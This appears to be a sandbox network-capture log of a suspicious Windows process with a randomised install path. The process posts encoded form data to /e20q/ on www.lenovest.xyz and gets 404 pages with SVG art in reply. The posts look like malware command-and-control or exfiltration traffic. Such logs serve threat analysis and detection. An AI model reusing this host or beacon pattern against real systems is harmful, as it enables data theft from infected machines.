May 30, 2024 15:03:14.678502083 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:03:14 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
May 30, 2024 15:03:14.678525925 CEST	224	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
May 30, 2024 15:03:14.678702116 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
May 30, 2024 15:03:14.678716898 CEST	1236	IN	Data Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
May 30, 2024 15:03:14.678795099 CEST	1236	IN	Data Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37 Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
May 30, 2024 15:03:14.678805113 CEST	1236	IN	Data Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
May 30, 2024 15:03:14.678817987 CEST	1236	IN	Data Raw: 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c Data Ascii: 33" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034
May 30, 2024 15:03:14.678828955 CEST	1120	IN	Data Raw: 37 2e 34 33 37 39 36 20 2d 30 2e 30 35 38 39 31 2c 34 35 2e 33 35 32 31 20 30 2e 30 35 38 39 32 2c 31 37 2e 39 31 34 31 33 20 30 2e 32 39 34 36 31 2c 33 39 2e 33 36 31 35 33 20 30 2e 37 30 37 30 39 31 2c 35 38 2e 38 30 37 33 38 20 30 2e 34 31 32 Data Ascii: 7.43796 -0.05891,45.3521 0.05892,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoi
May 30, 2024 15:03:14.678905010 CEST	1236	IN	Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
May 30, 2024 15:03:14.678917885 CEST	1236	IN	Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
May 30, 2024 15:03:14.683923960 CEST	1236	IN	Data Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49734	162.0.213.94	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:03:16.623153925 CEST	714	OUT	POST /e20q/ HTTP/1.1 Host: www.lenovest.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 227 Origin: http://www.lenovest.xyz Referer: http://www.lenovest.xyz/e20q/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 62 4e 44 43 75 67 58 31 6e 58 47 4c 44 4b 32 75 4d 6c 61 49 5a 42 67 38 34 57 73 30 36 31 33 42 2f 4f 34 49 62 32 39 38 53 51 41 42 62 65 38 4f 4e 66 33 61 59 68 6d 72 37 48 47 73 48 35 4f 4a 4d 65 37 68 5a 56 50 32 33 59 68 33 65 72 4e 72 63 5a 76 46 49 34 72 6c 61 47 70 4b 53 4e 61 46 57 4c 69 76 52 42 69 79 44 77 6a 4d 69 34 6d 43 51 41 38 51 37 43 53 47 64 6d 63 62 61 61 70 4e 6c 39 30 33 6a 41 6d 69 52 69 70 64 35 4a 75 75 77 74 63 58 30 43 75 48 44 38 47 33 65 42 44 32 43 6f 33 6e 66 44 6a 46 76 47 54 53 34 7a 43 64 70 66 2b 36 4c 30 45 32 53 6b 4f 59 50 56 70 79 6b 55 43 33 66 50 51 2f 47 57 79 49 70 42 61 45 4a 37 42 64 6c 79 66 65 49 67 79 77 Data Ascii: I2ID3h=bNDCugX1nXGLDK2uMlaIZBg84Ws0613B/O4Ib298SQABbe8ONf3aYhmr7HGsH5OJMe7hZVP23Yh3erNrcZvFI4rlaGpKSNaFWLivRBiyDwjMi4mCQA8Q7CSGdmcbaapNl903jAmiRipd5JuuwtcX0CuHD8G3eBD2Co3nfDjFvGTS4zCdpf+6L0E2SkOYPVpykUC3fPQ/GWyIpBaEJ7BdlyfeIgyw
May 30, 2024 15:03:17.225328922 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:03:17 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
May 30, 2024 15:03:17.225344896 CEST	1236	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
May 30, 2024 15:03:17.225354910 CEST	1236	IN	Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
May 30, 2024 15:03:17.225366116 CEST	1236	IN	Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
May 30, 2024 15:03:17.225375891 CEST	896	IN	Data Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32 Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
May 30, 2024 15:03:17.225385904 CEST	1236	IN	Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20 Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
May 30, 2024 15:03:17.225394964 CEST	1236	IN	Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32 Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
May 30, 2024 15:03:17.225404024 CEST	1236	IN	Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
May 30, 2024 15:03:17.225415945 CEST	1236	IN	Data Raw: 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 Data Ascii: e-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;s
May 30, 2024 15:03:17.225425959 CEST	896	IN	Data Raw: 2d 77 69 64 74 68 3a 30 2e 38 32 31 37 30 32 32 34 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a Data Ascii: -width:0.82170224;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse transform="translate(-170.14515,-0.038164)" ry="3.880542" rx="3.5777507" cy="164.5713"
May 30, 2024 15:03:17.230546951 CEST	1236	IN	Data Raw: 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 Data Ascii: 000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4570" d="m 325,163.45184 c 1.66722,0.6259

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49735	162.0.213.94	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:03:19.166351080 CEST	1731	OUT	POST /e20q/ HTTP/1.1 Host: www.lenovest.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1243 Origin: http://www.lenovest.xyz Referer: http://www.lenovest.xyz/e20q/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 62 4e 44 43 75 67 58 31 6e 58 47 4c 44 4b 32 75 4d 6c 61 49 5a 42 67 38 34 57 73 30 36 31 33 42 2f 4f 34 49 62 32 39 38 53 51 49 42 62 72 67 4f 63 49 44 61 5a 68 6d 72 79 6e 47 74 48 35 4f 75 4d 65 6a 66 5a 56 53 44 33 61 5a 33 65 4f 5a 72 4a 59 76 46 43 34 72 6c 52 6d 70 48 4e 64 61 71 57 4c 79 72 52 46 4f 79 44 77 6a 4d 69 2b 43 43 5a 7a 6b 51 39 43 53 5a 61 6d 63 74 65 61 70 70 6c 39 73 6e 6a 41 6a 41 45 43 4a 64 35 6f 53 75 78 62 41 58 38 43 75 42 4e 63 47 76 65 42 65 32 43 6f 36 4c 66 44 48 76 76 42 2f 53 31 79 6e 61 2b 2b 75 67 4a 69 4d 72 61 6e 43 49 53 6c 64 51 37 45 2b 55 59 4d 30 48 47 6c 57 69 70 48 2b 39 45 2f 4d 6b 2b 56 47 4d 4f 6e 62 54 4b 66 4a 6b 75 72 7a 70 51 4d 43 56 6b 79 6f 62 74 70 5a 56 64 48 67 6e 5a 56 44 44 59 52 31 34 31 45 64 4a 45 62 44 46 6f 35 33 71 64 30 32 47 47 43 38 37 69 45 41 49 38 2f 49 4a 52 6a 49 35 55 6d 37 55 41 4d 73 43 55 64 59 73 37 67 37 6a 68 6f 2f 39 6c 73 44 6b 33 34 68 58 67 46 4a 52 54 49 30 6e 48 77 6e 6a 55 72 62 4a 38 7a 39 [TRUNCATED] Data Ascii: I2ID3h=bNDCugX1nXGLDK2uMlaIZBg84Ws0613B/O4Ib298SQIBbrgOcIDaZhmrynGtH5OuMejfZVSD3aZ3eOZrJYvFC4rlRmpHNdaqWLyrRFOyDwjMi+CCZzkQ9CSZamcteappl9snjAjAECJd5oSuxbAX8CuBNcGveBe2Co6LfDHvvB/S1yna++ugJiMranCISldQ7E+UYM0HGlWipH+9E/Mk+VGMOnbTKfJkurzpQMCVkyobtpZVdHgnZVDDYR141EdJEbDFo53qd02GGC87iEAI8/IJRjI5Um7UAMsCUdYs7g7jho/9lsDk34hXgFJRTI0nHwnjUrbJ8z90dLPcqbH8SidYFejjNKDqUsb+HIqbG7ch3wY5+7gQsTTFj17FleujLCpgzjDjrBMfAVWOuoP032H7Pqo/dw4nEVV1DoUYX67LFCi5D6uyiLP5TX5oQoeknTyufamabPSiwS0gayCK6JSJn2qIG9Z53u0sFClByD+xbbRshB1aD+fnsimmkL4YIHyLwcNsNAi1Pfqt9PKgmCd/kVAgH8Ko4zhmj08HrVfNDgmBnNDgA05SSlnRx8VJjN0UV+meeVGQ7/PSY0amgTmg6s3CyN8vNePSwzdtqT8O5w7OcnozYRBlk0BgBwqnIwEDu+tntXIe6r5L1a2V9vcJ7W6Lq7Ky0zl4rUx0xFy2YerKVM3Ab8SfAbuHM+ssqmekZ19r3gdHUWUHsX5hw5aeIJyrGPjAy6t9r13wTJWQ4cXVzYPb5GuqnjxiH8aFsFnOtCvHoJdLIWbgQ+ZUT2xg6KIo6wEhdXBzIvOAS1k7G4/M1CFMkCWp5djnf0bAnekTDpP426LTlRORx/2sbOnSQB9xwhydVxdqddM0EgDXlG4hfmfyPFuBw3EyR1pkyFvf0QVoo9AAerARYkhDuFCZ7hXtEseEUSdcxA9vxHytzVzabJl962CpFCVzTRYZr4ppo0KPQRZAk3NXLdlGaOVy28HOiuVLggY/8BbUgNwZJ [TRUNCATED]
May 30, 2024 15:03:19.839065075 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:03:19 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
May 30, 2024 15:03:19.839087009 CEST	224	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
May 30, 2024 15:03:19.839099884 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
